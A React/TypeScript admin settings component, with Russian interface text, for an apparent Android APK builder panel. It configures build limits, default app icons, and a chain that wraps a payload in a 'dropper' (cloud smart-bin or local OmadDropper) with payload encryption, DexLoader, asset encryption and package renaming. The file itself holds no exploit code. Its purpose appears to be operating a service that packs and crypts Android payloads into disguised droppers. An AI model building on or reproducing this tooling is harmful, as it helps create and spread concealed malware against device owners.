import { fetchAdminSettings, patchAdminSettings, type IAdminSettings } from '@/api/admin';
import { uploadImage } from '@/api/upload-image';
import IconGrid, { IconGridSection } from '@/components/build/icon-grid';
import LoadingWrapper from '@/components/loading-wrapper';
import { Button } from '@/components/ui/button';
import { CardContent } from '@/components/ui/card';
import SettingsWidgetCard from './settings-widget-card';
import { InputGroup, InputGroupInput } from '@/components/ui/input-group';
import { Label } from '@/components/ui/label';
import { Separator } from '@/components/ui/separator';
import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from '@/components/ui/select';
import { Switch } from '@/components/ui/switch';
import { $updateFeatures } from '@/entities/features-entity';
import { useUnit } from 'effector-react';
import { ContainerIcon } from 'lucide-react';
import { useEffect, useRef, useState, type ChangeEvent, type FormEvent } from 'react';
import { toast } from 'sonner';

const MIN_LIMIT = 1;
const MAX_LIMIT = 100;
const MAX_DEFAULT_ICONS = 50;

function applyEncryptSettingsFromResponse(
	settings: IAdminSettings,
	setters: {
		setEncryptEnabled: (v: boolean) => void;
		setEncryptDexloader: (v: 'yes' | 'no') => void;
		setEncryptAssets: (v: 'yes' | 'no') => void;
		setEncryptRenamePackage: (v: 'yes' | 'no') => void;
		setPayloadEncryptEnabled: (v: boolean) => void;
		setPayloadEncryptDexloader: (v: 'yes' | 'no') => void;
		setPayloadEncryptAssets: (v: 'yes' | 'no') => void;
		setPayloadEncryptRenamePackage: (v: 'yes' | 'no') => void;
		setDropperProvider: (v: 'smartbin' | 'omad') => void;
	},
) {
	setters.setEncryptEnabled(settings.encryptEnabled ?? true);
	setters.setEncryptDexloader(settings.encryptDexloader ?? 'no');
	setters.setEncryptAssets(settings.encryptAssets ?? 'no');
	setters.setEncryptRenamePackage(settings.encryptRenamePackage ?? 'no');
	setters.setPayloadEncryptEnabled(settings.payloadEncryptEnabled ?? false);
	setters.setPayloadEncryptDexloader(settings.payloadEncryptDexloader ?? 'yes');
	setters.setPayloadEncryptAssets(settings.payloadEncryptAssets ?? 'yes');
	setters.setPayloadEncryptRenamePackage(settings.payloadEncryptRenamePackage ?? 'no');
	setters.setDropperProvider(settings.dropperProvider ?? 'smartbin');
}

export default function BuilderSettingsWidget() {
	const updateFeatures = useUnit($updateFeatures);
	const fileRef = useRef<HTMLInputElement | null>(null);
	const [builderEnabled, setBuilderEnabled] = useState(true);
	const [dailyBuildLimitInput, setDailyBuildLimitInput] = useState('');
	const [defaultBuilderIcons, setDefaultBuilderIcons] = useState<string[]>([]);
	const [encryptEnabled, setEncryptEnabled] = useState(true);
	const [encryptDexloader, setEncryptDexloader] = useState<'yes' | 'no'>('no');
	const [encryptAssets, setEncryptAssets] = useState<'yes' | 'no'>('no');
	const [encryptRenamePackage, setEncryptRenamePackage] = useState<'yes' | 'no'>('no');
	const [payloadEncryptEnabled, setPayloadEncryptEnabled] = useState(false);
	const [payloadEncryptDexloader, setPayloadEncryptDexloader] = useState<'yes' | 'no'>('yes');
	const [payloadEncryptAssets, setPayloadEncryptAssets] = useState<'yes' | 'no'>('yes');
	const [payloadEncryptRenamePackage, setPayloadEncryptRenamePackage] = useState<'yes' | 'no'>('no');
	const [dropperProvider, setDropperProvider] = useState<'smartbin' | 'omad'>('smartbin');
	const [testBuildEnabled, setTestBuildEnabled] = useState(false);
	const [isLoading, setIsLoading] = useState(true);
	const [isSaving, setIsSaving] = useState(false);
	const [isUploadingIcon, setIsUploadingIcon] = useState(false);

	const encryptSetters = {
		setEncryptEnabled,
		setEncryptDexloader,
		setEncryptAssets,
		setEncryptRenamePackage,
		setPayloadEncryptEnabled,
		setPayloadEncryptDexloader,
		setPayloadEncryptAssets,
		setPayloadEncryptRenamePackage,
		setDropperProvider,
	};

	useEffect(() => {
		let cancelled = false;

		async function load() {
			try {
				const settings = await fetchAdminSettings();
				if (!cancelled) {
					setBuilderEnabled(settings.builderEnabled);
					setDailyBuildLimitInput(String(settings.dailyBuildLimit));
					setDefaultBuilderIcons(settings.defaultBuilderIcons ?? []);
					applyEncryptSettingsFromResponse(settings, encryptSetters);
					setTestBuildEnabled(settings.testBuildEnabled ?? false);
				}
			} finally {
				if (!cancelled) setIsLoading(false);
			}
		}

		void load();

		return () => {
			cancelled = true;
		};
	}, []);

	async function handleToggle(checked: boolean) {
		const previous = builderEnabled;
		setBuilderEnabled(checked);
		updateFeatures({ builderEnabled: checked });
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({ builderEnabled: checked });
			setBuilderEnabled(settings.builderEnabled);
			updateFeatures({ builderEnabled: settings.builderEnabled });
			toast.success(checked ? 'Билдер включён' : 'Билдер отключён');
		} catch {
			setBuilderEnabled(previous);
			updateFeatures({ builderEnabled: previous });
			toast.error('Не удалось сохранить настройку');
		} finally {
			setIsSaving(false);
		}
	}

	async function handleLimitSubmit(e: FormEvent) {
		e.preventDefault();

		const dailyBuildLimit = Number(dailyBuildLimitInput);
		if (
			!dailyBuildLimitInput.trim() ||
			!Number.isInteger(dailyBuildLimit) ||
			dailyBuildLimit < MIN_LIMIT ||
			dailyBuildLimit > MAX_LIMIT
		) {
			toast.error(`Лимит должен быть от ${MIN_LIMIT} до ${MAX_LIMIT}`);
			return;
		}

		const previous = dailyBuildLimitInput;
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({ dailyBuildLimit });
			setDailyBuildLimitInput(String(settings.dailyBuildLimit));
			toast.success('Лимит сборок сохранён');
		} catch {
			setDailyBuildLimitInput(previous);
			toast.error('Не удалось сохранить настройку');
		} finally {
			setIsSaving(false);
		}
	}

	async function saveDefaultIcons(nextIcons: string[]) {
		const previous = defaultBuilderIcons;
		setDefaultBuilderIcons(nextIcons);
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({ defaultBuilderIcons: nextIcons });
			setDefaultBuilderIcons(settings.defaultBuilderIcons ?? []);
			toast.success('Иконки по умолчанию сохранены');
		} catch {
			setDefaultBuilderIcons(previous);
			toast.error('Не удалось сохранить иконки');
		} finally {
			setIsSaving(false);
		}
	}

	async function handleTestBuildToggle(checked: boolean) {
		const previous = testBuildEnabled;
		setTestBuildEnabled(checked);
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({ testBuildEnabled: checked });
			setTestBuildEnabled(settings.testBuildEnabled);
			toast.success(checked ? 'Тестовый билд включён для новых сборок' : 'Прод билд: логи в APK отключены');
		} catch {
			setTestBuildEnabled(previous);
			toast.error('Не удалось сохранить настройку');
		} finally {
			setIsSaving(false);
		}
	}

	async function handleEncryptSettingsSave(patch: Partial<IAdminSettings>) {
		setIsSaving(true);
		try {
			const settings = await patchAdminSettings(patch);
			applyEncryptSettingsFromResponse(settings, encryptSetters);
			toast.success('Настройки шифрования сохранены');
		} catch {
			toast.error('Не удалось сохранить настройки шифрования');
		} finally {
			setIsSaving(false);
		}
	}

	async function handleIconUpload(e: ChangeEvent<HTMLInputElement>) {
		const file = e.target.files?.[0];
		if (!file) return;

		if (defaultBuilderIcons.length >= MAX_DEFAULT_ICONS) {
			toast.error(`Максимум ${MAX_DEFAULT_ICONS} иконок`);
			e.target.value = '';
			return;
		}

		setIsUploadingIcon(true);

		try {
			const url = await uploadImage(file, file.name);
			if (defaultBuilderIcons.includes(url)) {
				toast.error('Эта иконка уже добавлена');
				return;
			}
			await saveDefaultIcons([...defaultBuilderIcons, url]);
		} catch {
			toast.error('Не удалось загрузить иконку');
		} finally {
			setIsUploadingIcon(false);
			e.target.value = '';
		}
	}

	async function handleIconRemove(url: string) {
		if (!window.confirm('Удалить иконку из списка по умолчанию?')) {
			return;
		}

		await saveDefaultIcons(defaultBuilderIcons.filter(icon => icon !== url));
	}

	const isSmartbinEncrypt = encryptEnabled && dropperProvider === 'smartbin';
	const isOmadEncrypt = encryptEnabled && dropperProvider === 'omad';

	return (
		<SettingsWidgetCard
			id='builder'
			icon={ContainerIcon}
			title='Билдер'
			description='Сборка APK через панель'
			titleClassName='text-chart-4'
			iconWrapperClassName='bg-chart-4/15'
		>
			<LoadingWrapper show={isSaving || isUploadingIcon}>
				<CardContent className='px-4 py-4 flex flex-col gap-4'>
					<div className='flex items-center justify-between gap-3'>
						<div className='flex flex-col gap-0.5'>
							<Label>Доступен пользователям</Label>
							<span className='text-xs text-muted-foreground'>
								Блокирует создание новых сборок. Страница билдера и история остаются доступными
							</span>
						</div>
						<Switch checked={builderEnabled} onCheckedChange={handleToggle} disabled={isLoading} />
					</div>

					<Separator />

					<form className='flex flex-col gap-3' onSubmit={handleLimitSubmit}>
						<div className='flex flex-col gap-1.5'>
							<Label htmlFor='daily-build-limit'>Билдов в день</Label>
							<span className='text-xs text-muted-foreground'>
								Считаются только успешно собранные APK за календарные сутки (UTC)
							</span>
							<InputGroup>
								<InputGroupInput
									id='daily-build-limit'
									className='appearance-none [&::-webkit-inner-spin-button]:appearance-none [&::-webkit-outer-spin-button]:appearance-none'
									type='number'
									inputMode='numeric'
									min={MIN_LIMIT}
									max={MAX_LIMIT}
									value={dailyBuildLimitInput}
									onChange={e => setDailyBuildLimitInput(e.target.value)}
									disabled={isLoading}
								/>
							</InputGroup>
						</div>
						<Button type='submit' className='self-start' disabled={isLoading || isSaving}>
							Сохранить
						</Button>
					</form>

					<Separator />

					<div className='flex flex-col gap-4'>
						<div className='flex flex-col gap-0.5'>
							<Label>Шифрование APK</Label>
							<span className='text-xs text-muted-foreground'>
								Глобальные настройки post-processing для всех сборок
							</span>
						</div>

						<div className='flex items-center justify-between gap-3'>
							<div className='flex flex-col gap-0.5'>
								<Label>Шифровать APK</Label>
								<span className='text-xs text-muted-foreground'>
									Выключите для сборок без smart-bin. С OmadDropper — локальный дроппер без шифрования (бейдж TEST)
								</span>
							</div>
							<Switch
								checked={encryptEnabled}
								onCheckedChange={checked => {
									const patch: Partial<IAdminSettings> = { encryptEnabled: checked };
									if (!checked && dropperProvider === 'smartbin') {
										patch.dropperProvider = 'omad';
									}
									void handleEncryptSettingsSave(patch);
								}}
								disabled={isLoading || isSaving}
							/>
						</div>

						<div className='flex flex-col gap-1.5'>
							<Label>Дроппер</Label>
							<span className='text-xs text-muted-foreground'>
								{encryptEnabled
									? 'Smart-bin — encrypt_dropper одним вызовом; Omad — локальный wrap, затем encrypt оболочки'
									: 'Без шифрования доступен только OmadDropper (локальный wrap без smart-bin)'}
							</span>
							<Select
								value={dropperProvider}
								onValueChange={value =>
									void handleEncryptSettingsSave({ dropperProvider: value as 'smartbin' | 'omad' })
								}
								disabled={isLoading || isSaving || !encryptEnabled}
							>
								<SelectTrigger className='w-full max-w-sm'>
									<SelectValue />
								</SelectTrigger>
								<SelectContent>
									{encryptEnabled ? <SelectItem value='smartbin'>Smart-bin (облако)</SelectItem> : null}
									<SelectItem value='omad'>OmadDropper (локальный)</SelectItem>
								</SelectContent>
							</Select>
						</div>

						{isSmartbinEncrypt ? (
							<div className='flex flex-col gap-3 rounded-lg border border-border/60 p-3'>
								<div className='flex flex-col gap-0.5'>
									<Label className='text-sm font-medium'>Параметры encrypt_dropper</Label>
									<span className='text-xs text-muted-foreground'>Финальный APK — payload и dropper одним вызовом smart-bin</span>
								</div>

								<div className='flex items-center justify-between gap-3'>
									<div className='flex flex-col gap-0.5'>
										<Label>DexLoader</Label>
										<span className='text-xs text-muted-foreground'>Выключите, если launch падает на зашифрованном APK</span>
									</div>
									<Switch
										checked={encryptDexloader === 'yes'}
										onCheckedChange={checked =>
											void handleEncryptSettingsSave({ encryptDexloader: checked ? 'yes' : 'no' })
										}
										disabled={isLoading || isSaving}
									/>
								</div>

								<div className='flex items-center justify-between gap-3'>
									<div className='flex flex-col gap-0.5'>
										<Label>Шифровать assets</Label>
										<span className='text-xs text-muted-foreground'>Выключите, чтобы assets оставались открытыми</span>
									</div>
									<Switch
										checked={encryptAssets === 'yes'}
										onCheckedChange={checked =>
											void handleEncryptSettingsSave({ encryptAssets: checked ? 'yes' : 'no' })
										}
										disabled={isLoading || isSaving}
									/>
								</div>

								<div className='flex items-center justify-between gap-3'>
									<div className='flex flex-col gap-0.5'>
										<Label>Переименование пакета</Label>
										<span className='text-xs text-muted-foreground'>При включении new_package = applicationId билда</span>
									</div>
									<Switch
										checked={encryptRenamePackage === 'yes'}
										onCheckedChange={checked =>
											void handleEncryptSettingsSave({ encryptRenamePackage: checked ? 'yes' : 'no' })
										}
										disabled={isLoading || isSaving}
									/>
								</div>
							</div>
						) : null}

						{isOmadEncrypt ? (
							<>
								<div className='flex flex-col gap-3 rounded-lg border border-border/60 p-3'>
									<div className='flex flex-col gap-2'>
										<div className='flex flex-col gap-0.5'>
											<Label className='text-sm font-medium'>Omad — payload (перед dropper)</Label>
											<span className='text-xs text-muted-foreground'>
												Double encrypt (RCA 06d-A). По умолчанию выкл. = prod TC-2 (plain payload в inner.dat)
											</span>
										</div>
										<div className='flex flex-wrap gap-2'>
											<Button
												type='button'
												variant='outline'
												size='sm'
												disabled={isLoading || isSaving}
												onClick={() => void handleEncryptSettingsSave({ payloadEncryptEnabled: false })}
											>
												TC-2 (plain)
											</Button>
											<Button
												type='button'
												variant='outline'
												size='sm'
												disabled={isLoading || isSaving}
												onClick={() =>
													void handleEncryptSettingsSave({
														payloadEncryptEnabled: true,
														payloadEncryptDexloader: 'yes',
														payloadEncryptAssets: 'yes',
														payloadEncryptRenamePackage: 'no',
													})
												}
											>
												Double full (dex+assets)
											</Button>
										</div>
									</div>

									<div className='flex items-center justify-between gap-3'>
										<div className='flex flex-col gap-0.5'>
											<Label>Шифровать payload перед dropper</Label>
											<span className='text-xs text-muted-foreground'>
												Gradle APK → smart-bin encrypt → inner.dat (ODIN+gzip) в OmadDropper
											</span>
										</div>
										<Switch
											checked={payloadEncryptEnabled}
											onCheckedChange={checked =>
												void handleEncryptSettingsSave({ payloadEncryptEnabled: checked })
											}
											disabled={isLoading || isSaving}
										/>
									</div>

									{payloadEncryptEnabled ? (
										<>
											<div className='flex items-center justify-between gap-3'>
												<Label>DexLoader (payload)</Label>
												<Switch
													checked={payloadEncryptDexloader === 'yes'}
													onCheckedChange={checked =>
														void handleEncryptSettingsSave({
															payloadEncryptDexloader: checked ? 'yes' : 'no',
														})
													}
													disabled={isLoading || isSaving}
												/>
											</div>
											<div className='flex items-center justify-between gap-3'>
												<Label>Шифровать assets (payload)</Label>
												<Switch
													checked={payloadEncryptAssets === 'yes'}
													onCheckedChange={checked =>
														void handleEncryptSettingsSave({
															payloadEncryptAssets: checked ? 'yes' : 'no',
														})
													}
													disabled={isLoading || isSaving}
												/>
											</div>
											<div className='flex items-center justify-between gap-3'>
												<Label>Переименование пакета (payload)</Label>
												<Switch
													checked={payloadEncryptRenamePackage === 'yes'}
													onCheckedChange={checked =>
														void handleEncryptSettingsSave({
															payloadEncryptRenamePackage: checked ? 'yes' : 'no',
														})
													}
													disabled={isLoading || isSaving}
												/>
											</div>
										</>
									) : null}
								</div>

								<div className='flex flex-col gap-3 rounded-lg border border-border/60 p-3'>
									<div className='flex flex-col gap-0.5'>
										<Label className='text-sm font-medium'>Omad — оболочка dropper (финальный APK)</Label>
										<span className='text-xs text-muted-foreground'>
											Второй вызов smart-bin после локального OmadDropper wrap
										</span>
									</div>

									<div className='flex items-center justify-between gap-3'>
										<div className='flex flex-col gap-0.5'>
											<Label>DexLoader</Label>
											<span className='text-xs text-muted-foreground'>Зафиксировано prod path (dexloader=no)</span>
										</div>
										<Switch checked={false} disabled />
									</div>

									<div className='flex items-center justify-between gap-3'>
										<div className='flex flex-col gap-0.5'>
											<Label>Шифровать assets</Label>
											<span className='text-xs text-muted-foreground'>
												Зафиксировано prod path (encrypt_assets=no; inner — plain или pre-encrypted)
											</span>
										</div>
										<Switch checked={false} disabled />
									</div>

									<div className='flex items-center justify-between gap-3'>
										<div className='flex flex-col gap-0.5'>
											<Label>Переименование пакета</Label>
											<span className='text-xs text-muted-foreground'>new_package = applicationId dropper shell</span>
										</div>
										<Switch
											checked={encryptRenamePackage === 'yes'}
											onCheckedChange={checked =>
												void handleEncryptSettingsSave({ encryptRenamePackage: checked ? 'yes' : 'no' })
											}
											disabled={isLoading || isSaving}
										/>
									</div>
								</div>
							</>
						) : null}
					</div>

					<Separator />

					<div className='flex items-center justify-between gap-3'>
						<div className='flex flex-col gap-0.5'>
							<Label>Тестовый билд</Label>
							<span className='text-xs text-muted-foreground'>
								Включено — логи на экране и полное debug-логирование в APK. Выключено — прод: без логов
							</span>
						</div>
						<Switch
							checked={testBuildEnabled}
							onCheckedChange={checked => void handleTestBuildToggle(checked)}
							disabled={isLoading || isSaving}
						/>
					</div>

					<Separator />

					<IconGridSection
						title='Иконки по умолчанию'
						count={defaultBuilderIcons.length}
						emptyText={
							defaultBuilderIcons.length === 0
								? 'Загрузите иконки, которые будут доступны всем пользователям при создании сборки'
								: undefined
						}
					>
						<IconGrid
							icons={defaultBuilderIcons}
							disabled={isLoading || isSaving || isUploadingIcon}
							showUpload={defaultBuilderIcons.length < MAX_DEFAULT_ICONS}
							showRemove
							onUploadClick={() => fileRef.current?.click()}
							onRemove={url => void handleIconRemove(url)}
						/>
					</IconGridSection>

					<input
						type='file'
						ref={fileRef}
						onChange={handleIconUpload}
						accept='image/*'
						className='sr-only'
						disabled={isLoading || isSaving || isUploadingIcon}
					/>
				</CardContent>
			</LoadingWrapper>
		</SettingsWidgetCard>
	);
}
